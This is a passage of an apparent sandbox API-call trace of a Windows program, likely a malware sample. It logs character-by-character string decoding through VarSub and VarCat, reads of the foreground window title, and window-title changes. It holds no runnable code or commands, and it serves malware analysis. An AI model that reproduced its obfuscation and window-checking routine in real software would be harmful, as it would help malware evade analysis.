lpUsedDefaultChar=0x0) returned 1 [0179.373] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.373] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.373] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.374] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.374] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.374] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.375] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.375] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.376] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.376] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.377] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.377] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.378] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.378] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.378] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.379] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.379] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.379] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.380] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.380] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.380] GetForegroundWindow () returned 0x20086 [0179.381] GetLastError () returned 0x0 [0179.381] SysStringLen (param_1=" ") returned 0xff [0179.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.381] SysStringLen (param_1=" ") returned 0xff [0179.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.381] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.381] GetLastError () returned 0x0 [0179.381] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.382] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.382] SysStringLen (param_1="Prog") returned 0x4 [0179.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x11684fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0179.382] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0179.382] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0179.383] GetFocus () returned 0x0 [0179.383] lstrlenA (lpString="Prog") returned 4 [0179.383] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0179.383] IsWindow (hWnd=0x103c4) returned 1 [0179.383] IsWindow (hWnd=0x103c4) returned 1 [0179.384] IsWindow (hWnd=0x103c4) returned 1 [0179.384] IsWindow (hWnd=0x103c4) returned 1 [0179.384] GetFocus () returned 0x0 [0179.385] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0179.385] GetFocus () returned 0x0 [0179.385] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0179.385] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0179.386] GetFocus () returned 0x0 [0179.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0179.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0179.386] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.386] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.387] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0179.388] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.388] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0179.388] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.389] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.389] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.390] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.390] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.391] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.391] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.392] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.392] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.393] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.393] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.394] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.394] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.395] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.395] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.396] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.396] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.397] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.397] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.397] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.398] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.398] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.399] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.399] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.400] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.448] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.449] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.449] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.450] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.450] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.450] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.451] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.451] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.452] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.452] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.453] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.453] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.454] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.454] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.455] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.455] VarCat (in: 